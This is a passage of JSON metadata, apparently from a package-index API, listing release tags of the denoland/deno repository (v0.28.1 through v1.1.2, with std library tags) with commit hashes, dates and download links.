"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"co